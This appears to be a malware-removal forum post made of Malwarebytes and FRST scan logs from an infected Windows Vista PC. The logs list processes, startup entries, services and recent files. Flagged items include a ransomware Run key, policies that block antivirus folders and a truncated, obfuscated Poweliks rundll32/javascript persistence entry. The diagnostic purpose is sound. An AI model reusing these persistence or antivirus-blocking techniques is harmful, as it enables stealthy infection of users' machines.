PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\SETTINGS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], 
PUP.Optional.FrostwireTB.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{D4027C7F-154A-4066-A1AD-4243D8127440}, Quarantined, [d8c171584239cf67d207b7f7ca38da26], 
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [74251faa205b3bfbe62350acc2409a66], 
PUP.Optional.MindSpark.A, HKU\S-1-5-21-3726736968-409882640-1958551794-501-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\APPDATALOW\SOFTWARE\MapsGalaxy_39, Quarantined, [990042871b6054e235d494683ac823dd], 
 
Registry Values: 1
Trojan.Ransom.Gen, HKU\S-1-5-21-3726736968-409882640-1958551794-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|IrfuqApivh, regsvr32.exe "C:\ProgramData\IrfuqApivh\IrfuqApivh.dat", Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85]
 
Registry Data: 0
(No malicious items detected)
 
Folders: 0
(No malicious items detected)
 
Files: 1
Trojan.Ransom.Gen, C:\ProgramData\IrfuqApivh\IrfuqApivh.dat, Quarantined, [d9c0d5f48bf0bc7a416eaaa220e47b85], 
 
Physical Sectors: 0
(No malicious items detected)
 
 
(end)
 
FRST
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:23-08-2014
Ran by savas.kyriakidis (administrator) on SAVASKYRIAKI-PC on 25-08-2014 09:47:13
Running from G:\
Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(ActivIdentity) C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgfws.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(SolarWinds) C:\Windows\dwrcs\DWRCS.EXE
( ) C:\Windows\System32\lxblcoms.exe
() C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBDeviceInfoProvider.exe
() C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG10\avgnsx.exe
(SolarWinds) C:\Windows\dwrcs\DWRCST.EXE
(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe
(Realtek Semiconductor) C:\Windows\RtHDVCpl.exe
(CyberLink Corp.) C:\Program Files\Dell\MediaDirect\PCMService.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuSchd2.exe
(Sony Corporation) C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acevents.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Apple Inc.) C:\Program Files\QuickTime\QTTask.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ActivIdentity) C:\Program Files\ActivIdentity\ActivClient\acsagent.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
() C:\Program Files\NETGEAR\WNA1100\WNA1100.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
(Glarysoft Ltd) C:\Program Files\Glary Utilities 5\Integrator.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Akamai Technologies, Inc.) C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqste08.exe
(Hewlett-Packard Co.) C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
(Hewlett-Packard) C:\Program Files\HP\Digital Imaging\bin\hpqgpc01.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Internet Services\APSDaemon.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
(Google Inc.) C:\Users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [ECenter] => C:\Dell\E-Center\EULALauncher.exe [17920 2008-02-29] ( )
HKLM\...\Run: [RtHDVCpl] => C:\Windows\RtHDVCpl.exe [4706304 2008-03-06] (Realtek Semiconductor)
HKLM\...\Run: [startCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [90112 2006-11-10] ()
HKLM\...\Run: [dscactivate] => C:\Program Files\Dell Support Center\gs_agent\custom\dsca.exe [16384 2008-03-11] ( )
HKLM\...\Run: [PCMService] => C:\Program Files\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM\...\Run: [AppleSyncNotifier] => C:\Program Files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe [59240 2012-02-23] (Apple Inc.)
HKLM\...\Run: [HP Software Update] => C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard)
HKLM\...\Run: [PMBVolumeWatcher] => C:\Program Files\Sony\PMB\PMBVolumeWatcher.exe [599328 2010-03-24] (Sony Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [997920 2011-06-15] (Microsoft Corporation)
HKLM\...\Run: [AVG_TRAY] => C:\Program Files\AVG\AVG10\avgtray.exe [2338656 2011-09-10] (AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM\...\Run: [acevents] => C:\Program Files\ActivIdentity\ActivClient\acevents.exe [153640 2009-06-03] (ActivIdentity)
HKLM\...\Run: [accrdsub] => C:\Program Files\ActivIdentity\ActivClient\accrdsub.exe [400936 2009-06-03] (ActivIdentity)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.)
HKLM\...\Run: [DameWare MRC Agent] => C:\Windows\dwrcs\DWRCST.exe [379752 2012-11-02] (SolarWinds)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\Microsoft Security Client <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\AVAST Software <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files\AVG <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM\...\Policies\Explorer: [useDefaultTile] 0
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [Akamai NetSession Interface] => C:\Users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [iCloudServices] => C:\Program Files\Common Files\Apple\Internet Services\iCloudServices.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [com.apple.dav.bookmarks.daemon] => C:\Program Files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe [59720 2013-10-02] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [ApplePhotoStreams] => C:\Program Files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [59720 2013-10-31] (Apple Inc.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-08-17] (Glarysoft Ltd)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [uINoteworthy] => C:\Windows\system32\rundll32.exe "C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll",DllRegisterServer <===== ATTENTION
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...\Run: [spybot-S&D Cleaning] => C:\Windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe [4566952 2014-06-24] (Safer-Networking Ltd.)
HKU\S-1-5-21-3726736968-409882640-1958551794-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ActivClient Agent.lnk
ShortcutTarget: ActivClient Agent.lnk -> C:\Program Files\ActivIdentity\ActivClient\acsagent.exe (ActivIdentity)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Metacafe.lnk
ShortcutTarget: Metacafe.lnk -> C:\$RECYCLE.BIN\S-1-5-21-3726736968-409882640-1958551794-1000\MetacafeAgent.exe (No File)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\NETGEAR WNA1100 Smart Wizard.lnk
ShortcutTarget: NETGEAR WNA1100 Smart Wizard.lnk -> C:\Program Files\NETGEAR\WNA1100\WNA1100.exe ()
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Guest\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Rita\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock.lnk
ShortcutTarget: Dell Dock.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\savas.kyriakidis\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneNote 2007 Screen Clipper and Launcher.lnk
ShortcutTarget: OneNote 2007 Screen Clipper and Launcher.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: autocheck autochk *  BootDefrag.exesasnative32
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xA02BBBD1D537CF01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: SSVHelper Class -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: CBrowserHelperObject Object -> {CA6319C0-31B7-401E-A518-A07C3DB8F777} -> C:\Program Files\Dell\BAE\BAE.dll (Dell Inc.)
BHO: HP Smart BHO Class -> {FFFFFFFF-CF4E-4F2B-BDC2-0E72E116A856} -> C:\Program Files\HP\Digital Imaging\Smart Web Printing\hpswp_BHO.dll (Hewlett-Packard Co.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
DPF: {5D637FAD-E202-48D1-8F18-5B9C459BD1E3} http://www.winkflash.com/photo/loaders/ImageUploader5.cab
DPF: {82E5DF24-51E8-47CD-864A-F4BD5005AA73} https://www.icloud.com/system/iCloud.cab
DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG10\avgpp.dll (AVG Technologies CZ, s.r.o.)
Winsock: Catalog5 01 %SystemRoot%\System32\mswsock.dll [223232] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 66.18.32.2 66.18.32.3
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-06]
FF HKLM\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
FF Extension: HP Smart Web Printing - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2 [2010-09-02]
FF HKLM\...\Firefox\Extensions: [{1E73965B-8B48-48be-9C8D-68B920ABC1C4}] - C:\Program Files\AVG\AVG10\Firefox4
FF Extension: AVG Safe Search - C:\Program Files\AVG\AVG10\Firefox4 [2011-07-10]
FF HKCU\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn2
 
Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [icmlaeflemplmjndnaapfdbbnpncnbda] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx []
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 ac.sharedstore; C:\Program Files\Common Files\ActivIdentity\ac.sharedstore.exe [207400 2009-06-03] (ActivIdentity)
S3 AVG Security Toolbar Service; C:\Program Files\AVG\AVG10\Toolbar\ToolbarBroker.exe [167264 2011-11-10] ()
R2 avgfws; C:\Program Files\AVG\AVG10\avgfws.exe [2708024 2011-03-09] (AVG Technologies CZ, s.r.o.)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG10\Identity Protection\Agent\Bin\AVGIDSAgent.exe [7390560 2011-08-18] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG10\avgwdsvc.exe [269520 2011-02-08] (AVG Technologies CZ, s.r.o.)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [161048 2008-04-28] (Stardock Corporation)
R2 dwmrcs; C:\Windows\dwrcs\DWRCS.EXE [705384 2012-11-02] (SolarWinds)
R3 hpqcxs08; C:\Program Files\HP\Digital Imaging\bin\hpqcxs08.dll [217088 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 hpqddsvc; C:\Program Files\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files\HP\Digital Imaging\bin\HPSLPSVC32.DLL [634880 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S3 jswpsapi; C:\Program Files\NETGEAR\WNA1100\jswpsapi.exe [960992 2010-03-22] (Atheros Communications, Inc.)
R2 lxbl_device; C:\Windows\system32\lxblcoms.exe [537520 2007-04-20] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [44032 2008-07-18] (Hewlett-Packard) [File not signed]
S3 NisSrv; c:\Program Files\Microsoft Security Client\Antimalware\NisSrv.exe [208944 2011-04-27] (Microsoft Corporation)
R2 PassThru Service; C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe [87040 2012-03-23] () [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [53760 2008-07-18] (Hewlett-Packard) [File not signed]
R2 WSWNA1100; C:\Program Files\NETGEAR\WNA1100\WifiSvc.exe [266240 2010-08-04] () [File not signed]
S2 vToolbarUpdater; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\9.0.1\ToolbarUpdater.exe [X]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 athur; C:\Windows\System32\DRIVERS\athur.sys [1439744 2010-10-10] (Atheros Communications, Inc.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [248656 2011-01-07] (AVG Technologies CZ, s.r.o.)
R1 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [34896 2011-03-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [32592 2011-03-16] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [297168 2011-04-05] (AVG Technologies CZ, s.r.o.)
R0 BootDefragDriver; C:\Windows\System32\drivers\BootDefragDriver.sys [16064 2014-07-18] (Glarysoft Ltd)
S3 gfiark; C:\Windows\System32\drivers\gfiark.sys [43368 2013-05-23] (ThreatTrack Security)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17216 2014-08-14] (Glarysoft Ltd)
R1 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [165648 2011-04-18] (Microsoft Corporation)
S3 MpNWMon; C:\Windows\System32\DRIVERS\MpNWMon.sys [43392 2011-04-18] (Microsoft Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [27648 2008-03-06] (Windows ® Codename Longhorn DDK provider)
R0 SCMNdisP; C:\Windows\System32\DRIVERS\scmndisp.sys [21728 2007-01-19] (Windows ® Codename Longhorn DDK provider)
S3 USBAAPL; C:\Windows\System32\Drivers\usbaapl.sys [42496 2011-08-02] (Apple, Inc.) [File not signed]
U5 AppMgmt; C:\Windows\system32\svchost.exe [21504 2008-01-20] (Microsoft Corporation)
S1 AVGIDSDriver; system32\DRIVERS\avgidsdriverx.sys [X]
S1 AVGIDSShim; system32\DRIVERS\avgidsshimx.sys [X]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S1 MpKslb9ee2848; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{BFB5F758-88DD-40A2-8570-9299F94880E8}\MpKslb9ee2848.sys [X]
S1 MpKslbb89cfa8; \??\c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{A306A4ED-0116-4B29-AE29-DC65EC41A044}\MpKslbb89cfa8.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 SWDUMon; system32\DRIVERS\SWDUMon.sys [X]
S3 TfNetMon; \??\C:\Windows\system32\drivers\TfNetMon.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-24 15:45 - 2014-08-24 15:45 - 00046297 _____ () C:\ComboFix.txt
2014-08-24 15:23 - 2014-08-24 15:46 - 00000000 ____D () C:\ComboFix
2014-08-23 16:54 - 2014-08-25 09:47 - 00000000 ____D () C:\FRST
2014-08-23 16:30 - 2014-08-25 09:35 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-08-23 16:30 - 2014-08-25 08:26 - 00000901 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-08-25 08:26 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-23 16:30 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-08-23 16:30 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-08-23 12:25 - 2011-06-26 02:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-08-23 12:25 - 2010-11-07 13:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-08-23 12:25 - 2009-04-20 00:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00098816 _____ () C:\Windows\sed.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00080412 _____ () C:\Windows\grep.exe
2014-08-23 12:25 - 2000-08-30 20:00 - 00068096 _____ () C:\Windows\zip.exe
2014-08-23 12:12 - 2014-08-23 12:12 - 00007836 _____ () C:\Users\savas.kyriakidis\Desktop\reg.txt
2014-08-23 12:03 - 2014-08-23 12:03 - 00009362 _____ () C:\Users\savas.kyriakidis\Desktop\safer.txt
2014-08-23 11:51 - 2014-08-23 11:53 - 00000000 ____D () C:\AdwCleaner
2014-08-23 11:49 - 2014-08-23 11:49 - 00007919 _____ () C:\Users\savas.kyriakidis\Desktop\JRT.txt
2014-08-23 11:42 - 2014-08-23 11:42 - 00000000 ____D () C:\Windows\ERUNT
2014-08-23 11:02 - 2014-08-23 11:05 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-08-22 17:06 - 2013-09-04 14:57 - 00024040 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiutil.sys
2014-08-22 17:06 - 2013-05-23 08:39 - 00043368 _____ (ThreatTrack Security) C:\Windows\system32\Drivers\gfiark.sys
2014-08-22 17:05 - 2014-08-22 21:40 - 00000000 ____D () C:\VIPRERESCUE
2014-08-22 17:05 - 2014-08-22 17:05 - 00000000 ____D () C:\EEK
2014-08-22 16:12 - 2014-08-25 09:17 - 00039662 _____ () C:\Windows\PFRO.log
2014-08-22 15:52 - 2014-08-24 15:45 - 00000000 ____D () C:\Qoobox
2014-08-22 14:32 - 2014-08-22 15:42 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy.BackupBySpybotPortable
2014-08-22 14:32 - 2014-08-22 14:32 - 00000000 ____D () C:\Users\savas.kyriakidis\Documents\ProcAlyzer Dumps
2014-08-22 14:00 - 2014-08-23 16:48 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-08-22 13:41 - 2014-08-22 13:54 - 00000000 ____D () C:\Windows\dwrcs
2014-08-22 13:41 - 2014-08-22 13:41 - 00000000 ____D () C:\ProgramData\DameWare Development
2014-08-22 13:25 - 2014-08-25 08:17 - 00000850 _____ () C:\Windows\setupact.log
2014-08-22 13:25 - 2014-08-22 13:25 - 00000000 _____ () C:\Windows\setuperr.log
2014-08-20 19:17 - 2014-08-20 19:17 - 00319456 _____ (Microsoft Corporation) C:\Windows\DIFxAPI.dll
2014-08-20 18:46 - 2014-08-20 18:46 - 00000666 _____ () C:\Toolbars.dat
2014-08-20 18:12 - 2014-08-19 18:12 - 00075264 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2014-08-20 18:08 - 2014-08-20 18:08 - 00000000 ____D () C:\Users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-19 23:07 - 2014-08-19 23:07 - 00000000 ____D () C:\ProgramData\GlarySoft
